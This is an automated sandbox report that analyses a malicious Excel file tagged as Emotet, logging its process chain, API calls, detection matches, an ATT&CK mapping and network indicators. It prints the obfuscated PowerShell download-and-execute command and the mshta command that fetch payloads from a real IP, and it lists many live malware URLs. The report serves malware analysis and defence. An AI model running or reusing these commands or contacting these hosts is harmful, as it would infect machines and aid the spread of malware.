                            Source: rundll32.exe, 0000000F.00000002.608665312.00000000004CA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_002A7E00 FindFirstFileW, 17_2_002A7E00
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00384087 mov eax, dword ptr fs:[00000030h]9_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]10_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00284087 mov eax, dword ptr fs:[00000030h]11_2_00284087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00194087 mov eax, dword ptr fs:[00000030h]12_2_00194087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00264087 mov eax, dword ptr fs:[00000030h]14_2_00264087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00234087 mov eax, dword ptr fs:[00000030h]15_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_003B4087 mov eax, dword ptr fs:[00000030h]16_2_003B4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_002B4087 mov eax, dword ptr fs:[00000030h]17_2_002B4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
                            Source: Yara matchFile source: 2022-28-01_1202.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 0000000C.00000002.566399792.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566320781.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529511633.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565939675.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529254761.0000000000921000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609334950.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609062898.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529784917.0000000003100000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.611503359.00000000003A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.529563571.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609120107.00000000030C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565832376.00000000003F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566124768.00000000023B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609258728.0000000003121000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.491615915.0000000000240000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.566069057.00000000022E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.609178207.00000000030F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.666953938.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667829863.0000000002D20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565803219.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.667636789.0000000002B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565639567.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.608543419.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565905688.0000000000521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: C:\ProgramData\JooSee.dll, type: DROPPED
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 21 Scripting | 1 Windows Service | 1 Windows Service | 1 Disable or Modify Tools | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 13 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 13 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 21 Scripting | Security Account Manager | 38 System Information Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | 11 Command and Scripting Interpreter | Logon Script (Mac) | Logon Script (Mac) | 2 Obfuscated Files or Information | NTDS | 21 Security Software Discovery | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 122 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | 1 Service Execution | Network Logon Script | Network Logon Script | 2 Masquerading | LSA Secrets | 1 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | 1 PowerShell | Rc.common | Rc.common | 1 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Hidden Files and Directories | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior graph (ID: 562524; sample: 2022-28-01_1202.xls; start date: 29/01/2022; architecture: WINDOWS; score: 100). Process chain: EXCEL.EXE -> cmd.exe -> mshta.exe -> powershell.exe -> cmd.exe -> rundll32.exe (chain of child rundll32.exe processes). powershell.exe drops C:\ProgramData\JooSee.dll (PE32).

Source | Detection | Scanner | Label | Link
2022-28-01_1202.xls | 12% | ReversingLabs | Document-Excel.Trojan.Emotet |

Source | Detection | Scanner | Label | Link
C:\ProgramData\JooSee.dll | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
hostfeeling.com | 11% | Virustotal | | Browse
jurnalpjf.lan.go.id | 1% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hostfeeling.com | 164.90.147.135 | true | true | | unknown
jurnalpjf.lan.go.id | 103.206.244.105 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://91.240.118.172/gg/ff/fe.png | true | Avira URL Cloud: malware | unknown
http://jurnalpjf.lan.go.id/assets/iM/ | true | Avira URL Cloud: malware | unknown
http://91.240.118.172/gg/ff/fe.html | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                            • Avira URL Cloud: malware
                            unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://gudangtasorichina.com/wp-content/GG01c/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://gudangtasorichina.com/wppowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://daisy.sukpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlvmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlngsmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;rundll32.exe, 00000011.00000002.667109716.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlmshtamshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlWinSta0mshta.exe, 00000004.00000002.433371038.00000000001E0000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172powershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            https://160.16.102.168/rundll32.exe, 00000011.00000002.666782333.00000000001DD000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.667122057.00000000007E5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.protware.commshta.exe, 00000004.00000002.433703673.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.413147395.0000000002A4D000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000006.00000002.666941334.0000000000350000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlYmshta.exe, 00000004.00000003.411782427.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428057255.000000000027C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.433444835.000000000027C000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.673143883.00000000035BE000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlB2022-28-01_1202.xls.0.drtrue
                              • Avira URL Cloud: malware
                              unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://91.240.118.172/gg/ff/fe.htmlKmshta.exe, 00000004.00000002.433387100.000000000021E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.673315337.0000000003716000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 562524
Start date: 29.01.2022
Start time: 00:13:32
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 54s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 2022-28-01_1202.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLS@25/9@2/48
EGA Information:
• Successful, ratio: 80%
HDC Information:
• Successful, ratio: 25.8% (good quality ratio 21.6%)
• Quality average: 64.7%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 56
• Number of non-executed functions: 197
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 92.123.101.170, 92.123.101.179
• Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
• Execution Graph export aborted for target mshta.exe, PID 1928 because there are no executed function
• Execution Graph export aborted for target powershell.exe, PID 1160 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
00:14:18  API Interceptor  57x Sleep call for process: mshta.exe modified
00:14:22  API Interceptor  439x Sleep call for process: powershell.exe modified
00:15:00  API Interceptor  159x Sleep call for process: rundll32.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                                                                                                                      imedpub_2.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub.com_6.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      imedpub.com_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      iMedPub LTD_10.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      iMedPub LTD_12.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 51.15.4.22
                                                                                                                                                      No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy) | 2022-28-01_1203.xls | | malicious | |
C:\ProgramData\JooSee.dll | 2022-28-01_1203.xls | | malicious | |
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):548864
                                                                                                                                                          Entropy (8bit):6.980507701343226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:B2AavzUBPSczbeeTLjvryMwWd3DYr6i64/:OUBPSczbeeTnvDZDWA
